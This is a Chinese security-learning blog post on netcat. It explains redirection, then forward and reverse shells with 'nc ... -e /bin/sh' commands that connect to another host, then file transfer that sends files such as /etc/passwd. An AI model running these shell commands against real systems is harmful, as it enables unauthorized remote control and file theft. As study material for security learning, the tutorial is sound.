NC工具—文件传输&shell获取功能

前言:此文主要对NC(NETCAT)工具的文件传输SHELL获取功能进行学习记录,不对工具简介和基本功能进行赘述,可参考我的另一篇文章Web安全工具—nc(瑞士军刀)持续更新

一: 基础知识:

1,文件传输基础知识
linux下的输入重定向"<“和输出重定向”>"介绍
输入重定向:
举例cat < /etc/passwd: 将passwd文件的作为输入重定向给cat命令,其效果相当于cat /etc/passwd

输出重定向:
举例:ll /etc/passwd > websec.txt:将ll查看的文件信息重定向到文件websec.txt中

2,shell获取基础支持
正向shell:客户端主动去连接服务端,控制端主动去连接被控制端(通常适用于被控制端存在可以连接的端口)
反向shell:服务端主动连接客户端,被控制端主动连接控制端(通常适用于,服务端的服务端口存在限制,客户端不能直接连接,但是服务端发起连接未作限制的场景)
windows下shell文件路径:/windows/system32/cmd.exe
linux下shell文件路径:/bash/sh
-e参数:程序重定向

二:shell获取

正向shell获取:
服务端监听555端口:nc -lv -p 555 -e /bin/sh

客户端连接服务端的555端口:nc -nv 192.168.1.4 555

反向shell获取:和正向shell相反,客户端建立监听端口,服务端进行连接
客户端端监听666端口:nc -lv -p 666

服务端连接服务端的666端口:nc -nv 192.168.1.123 666 -e /bin/sh

总结:不管是正向shell还是反向shell,其目的都是客户端控制服务端达到目的,相比正向shell,反向shell的稳定性和利用程度更高。

三:文件传输

原理:nc工具的文件传输原理其实是linux下的输入和输出重定向利用,服务端将监听到的数据输出重定向到文件中,客户端将文件通过输入重定向发送给服务端
举例:
服务端监听333端口,然后将连接到333端口的数据重定向至文件websec中:nc -lv -p 333 > websec

客户端将/etc/passwd文件输出重定向给连接服务端

**总结:**不管是客户端传送文件给服务端,还是服务端传送文件给客户端,其利用的原理都是linux下的输出和输入重定向,但是需要了解的是这里的输入和输出重定向都是覆盖性的,如果需要增量添加则需要选择">>“和”<<"。

参考学习文章:

nc基础使用和简介
Netcat、PowerCat用法详解

NC工具—文件传输shell获取功能相关推荐

  1. shell访问php文件夹,Shell获取某目录下所有文件夹的名称

    Shell获取某目录下所有文件夹的名称以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧! Shell获取某目录下所有文件夹的 ...

  2. Linux小技巧:使用NC实现文件传输

    之前在服务器上拷贝文件时,要么使用scp, 要么就是上传到ftp服务器,然后再需要使用的服务器上重新下载,虽然这两种方式也没啥毛病,但是缺陷也比较明显 scp: 要求授权验证 ftp: 需要一个第三方 ...

  3. NC / Netcat - 文件传输

    文件传输:将文件从B用户机器传输到A用户机器. 实验环境1: A用户,windows系统,IP:192.168.12.109B用户,linux系统,IP:192.168.79.3 A用户作为接受传输文 ...

  4. 如何测试微信文件传输的这个功能,说出测试点,还有测试类型,以及测试用例

    我们在测试任何软件的一些功能之前都应该先把整体的流程梳理一遍. 梳理完成之后很轻而易举的就能说出里面的测试点 第一,点击文件传输,检查文件传输页面的展示 检查是否正常弹出文件选择页面并且对应的路径文件 ...

  5. 易语言通过服务器发送文件,易语言局域网文件传输带聊天功能例程

    这是我大约在半年以前的作品,但是当时由于一些原因并没有完成.算是个半成品,有兴趣的可以下载来研究一下 .版本 2 .支持库 eAPI ' 源码例程来自亦行(yx)博客,由yx编写发布.如有转载请注明来 ...

  6. 8个免费高速文件传输工具,让你彻底告别网盘和数据线

    文章来源:平凡而诗意 作者:Jackpop 文件传输是日常使用较为频繁的一项功能,电脑与电脑.电脑与手机.手机与手机.... 以往的文件传输主要可以分为2种方式: 基于硬件:数据线.移动硬盘.U盘 基 ...

  7. 有病毒的u盘文件上传到服务器,还在被u盘病毒困扰?送你15个文件传输网站以及20+u盘工具...

    哈喽大家好,我是无知便是罪,专注于收集和分享互联网上不为人知的好东西.今天让我们继续聊一聊文件传输,这要分为两类吧,一种是个人多设备之间的跨平台传输,就像手机与电脑之间,我们前面已经介绍过了.今天他主 ...

  8. 企业远程文件传输工具

    利用远程文件传输的强大功能在全球计算机之间发送和接收文件或文件夹.从可执行文件到根证书,无需借助外部设备即可安全地共享任何格式的文件.文件共享可以通过两种方式完成:查看器到远程设备,反之亦然.Remo ...

  9. 什么是安全文件传输?

    从一个人或组织将敏感且通常专有的文件传输到另一个人或文件已经成为当今商业世界的一个复杂方面.这种复杂性不仅来自于需要共享的文件的大小和数量,还来自于在从发送者到接收者的整个过程中的所有时间都需要保护它 ...

最新文章

  1. 创建一个打不开删不掉的文件夹
  2. 若依前后端分离版(vue)中配置页面跳转的路由
  3. Iterator与ListIterator有什么区别
  4. 11 Interior-point methods and Conclusions
  5. 提示缺少Qedit.h问题
  6. matlab的点平方,性能 – 有效地计算Matlab中的成对平方欧几里德距离
  7. 演示JSP Scriptlets、声明语句、jsp表达式的使用
  8. python相关工具使用技巧(pip)
  9. struts html form提交加密,strutshtml:form标签有关问题  解决立即给分
  10. Android Multimedia框架总结(二十)MediaCodec状态周期及Codec与输入/输出Buffer过程(附实例)
  11. python路线图_Python路线图
  12. 【Excel】下拉填充相同的数据
  13. Routeros花生壳域名解析脚本
  14. php 方差函数,PHP应用:PHP基于方差和标准差计算学生成绩的稳定性示例
  15. markdown编辑器推荐(附官网)
  16. 完美世界手游服务器维护中,完美世界手游黑屏闪退解决办法 玩不了怎么办
  17. Jmeter性能测试脚本实战
  18. note3+android+5.1,最新的安卓5.1.1 ROOT教程(不需要刷第三方内核)
  19. 【公告】C币兑换平台上线
  20. 浮力辅助的全球与中国市场2022-2028年:技术、参与者、趋势、市场规模及占有率研究报告

热门文章

  1. logback日志配置(控制台日志、输出日志、错误日志)
  2. 叮咚 您的AI对象到货
  3. Java - 设计模式学习总结
  4. android强制分屏软件,第三方强制分屏app
  5. 怎么给视频去水印,如何一键消除水印
  6. Xcode 11 beta 4 error: Command CompileSwiftSources failed with a nonzero exit code
  7. “春节退出酒场告知书”,公务员必看!
  8. 如何在网上查找免费电子书
  9. 基于 JavaSwing 的招生信息管理系统的实现
  10. 教育培训课程报名管理系统(学生、教师、管理员)+SSM框架+mysql+tomcat+Maven项目(毕设学习)